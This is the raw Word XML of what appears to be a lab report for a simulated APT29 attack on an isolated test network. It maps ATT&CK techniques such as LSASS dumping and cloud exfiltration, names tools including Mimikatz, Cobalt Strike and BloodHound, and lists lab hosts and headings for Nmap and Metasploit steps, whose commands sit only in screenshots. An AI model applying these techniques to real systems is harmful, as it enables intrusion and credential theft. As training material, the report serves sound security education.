    </w:p>
    <w:p w:rsidR="00C57BFC" w:rsidRPr="00C57BFC" w:rsidRDefault="00C57BFC" w:rsidP="00C57BFC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:num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b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Credential Access:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> T1003.001 (LSASS Memory Dumping) [48]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C57BFC" w:rsidRPr="00C57BFC" w:rsidRDefault="00C57BFC" w:rsidP="00C57BFC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:num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b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Discovery:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> T1087.002 (Domain Account Discovery) [49]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C57BFC" w:rsidRPr="00C57BFC" w:rsidRDefault="00C57BFC" w:rsidP="00C57BFC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:num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b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Lateral Movement:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> T1021.001 (RDP) [50]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C57BFC" w:rsidRPr="00C57BFC" w:rsidRDefault="00C57BFC" w:rsidP="00C57BFC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:num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b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Collection:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> T1213 (Data from Information Repositories) [51]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C57BFC" w:rsidRPr="00C57BFC" w:rsidRDefault="00C57BFC" w:rsidP="00C57BFC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:num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b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Exfiltration:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> T1567.002 (Exfiltration to Cloud Storage) [52]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C57BFC" w:rsidRPr="00C57BFC" w:rsidRDefault="00C57BFC" w:rsidP="00C57BFC">
      <w:p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b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Toolset:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C57BFC" w:rsidRPr="00C57BFC" w:rsidRDefault="00C57BFC" w:rsidP="00C57BFC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:num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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>C2 Framework: Cobalt Strike [53]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C57BFC" w:rsidRPr="00C57BFC" w:rsidRDefault="00C57BFC" w:rsidP="00C57BFC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:num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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Credential Harvesting: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Mimikatz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> [54], </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>LaZagne</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00C57BFC" w:rsidRPr="00C57BFC" w:rsidRDefault="00C57BFC" w:rsidP="00C57BFC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:num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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">AD Enumeration: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>BloodHound</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> [55], </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>PowerView</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00C57BFC" w:rsidRPr="00C57BFC" w:rsidRDefault="00C57BFC" w:rsidP="00C57BFC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:num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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploitation: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, custom Python scripts</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A13DDC" w:rsidRPr="00C57BFC" w:rsidRDefault="00C57BFC" w:rsidP="00A13DDC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Cloud Tools: AWS CLI, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ScoutSuite</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00C57BFC" w:rsidRPr="00C57BFC" w:rsidRDefault="00C57BFC" w:rsidP="00C57BFC">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rStyle w:val="cf01"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A13DDC" w:rsidRPr="00C57BFC" w:rsidRDefault="00A13DDC" w:rsidP="00A13DDC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="2E74B5" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="2E74B5" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3.3 Lab Environment Design</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Lab Environment Overview</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Your Network:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A13DDC" w:rsidRPr="00C57BFC" w:rsidRDefault="00A13DDC" w:rsidP="00A13DDC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A13DDC" w:rsidRPr="00C57BFC" w:rsidRDefault="00A13DDC" w:rsidP="00A13DDC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Kali Linux (Attacker): 192.168.18.59</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A13DDC" w:rsidRPr="00C57BFC" w:rsidRDefault="00A13DDC" w:rsidP="00A13DDC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Metasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Server: 192.168.18.52</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A13DDC" w:rsidRPr="00C57BFC" w:rsidRDefault="00A13DDC" w:rsidP="00A13DDC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>OWASP: 192.168.18.55</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A13DDC" w:rsidRPr="00C57BFC" w:rsidRDefault="00A13DDC" w:rsidP="00A13DDC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Windows 7: 192.168.18.60</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A13DDC" w:rsidRPr="00C57BFC" w:rsidRDefault="00A13DDC" w:rsidP="00A13DDC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Windows Server: 192.168.18.61</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A13DDC" w:rsidRPr="00C57BFC" w:rsidRDefault="00A13DDC" w:rsidP="00A13DDC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A13DDC" w:rsidRPr="00C57BFC" w:rsidRDefault="00A13DDC" w:rsidP="00A13DDC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Scenario</w:t>
      </w:r>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>: You're simulating APT29 (Russian state-sponsored hackers) targeting pharmaceutical research data.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A13DDC" w:rsidRPr="00C57BFC" w:rsidRDefault="00A13DDC" w:rsidP="00A13DDC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A13DDC" w:rsidRPr="00C57BFC" w:rsidRDefault="00A13DDC" w:rsidP="00A13DDC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A13DDC" w:rsidRPr="00C57BFC" w:rsidRDefault="00A13DDC" w:rsidP="00A13DDC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="004420E4" wp14:editId="50AE8665">
            <wp:extent cx="5943600" cy="3327400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2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9"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3327400"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w: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Verify Network Connectivity</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A13DDC" w:rsidRPr="00C57BFC" w:rsidRDefault="00A13DDC" w:rsidP="00A13DDC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A13DDC" w:rsidRPr="00C57BFC" w:rsidRDefault="00A13DDC" w:rsidP="00A13DDC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="5266BA0B" wp14:editId="49FC08B2">
            <wp:extent cx="5943600" cy="3327400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="58" name="image58.png"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image58.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId10"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3327400"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A13DDC" w:rsidRPr="00C57BFC" w:rsidRDefault="00A13DDC" w:rsidP="00A13DDC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>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 xml:space="preserve">Start </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="64E66031" wp14:editId="7505153C">
            <wp:extent cx="5943600" cy="3340100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="24"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11"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3340100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w: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Create Workspace</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drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="5F0C8C0A" wp14:editId="7F65558A">
            <wp:extent cx="5943600" cy="3340100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="20"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2"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3340100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w: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Create Pentest Directory</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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="6D8F7D46" wp14:editId="34C5E73C">
            <wp:extent cx="5943600" cy="3340100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="52" name="image54.png"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image54.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId13"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3340100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A13DDC" w:rsidRPr="00C57BFC" w:rsidRDefault="00A13DDC" w:rsidP="00A13DDC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00FD722A" w:rsidRPr="00C57BFC" w:rsidRDefault="00FD722A" w:rsidP="00A13DDC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A13DDC" w:rsidRPr="00C57BFC" w:rsidRDefault="00A13DDC" w:rsidP="00A13DDC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>PHASE 2: RECONNAISSANCE (Days 1-2)</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 xml:space="preserve">Network Discovery with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="2744A591" wp14:editId="0F906B12">
            <wp:extent cx="5943600" cy="3340100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="29" name="image35.png"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image35.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId14"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3340100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="32683847" wp14:editId="6343D21C">
            <wp:extent cx="5943600" cy="3340100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="57" name="image59.png"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image59.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId15"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3340100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="3BE05F9A" wp14:editId="29C07236">
            <wp:extent cx="5943600" cy="3340100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="16"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16"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3340100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w: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Port Scanning</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 xml:space="preserve">Scan </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Metasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
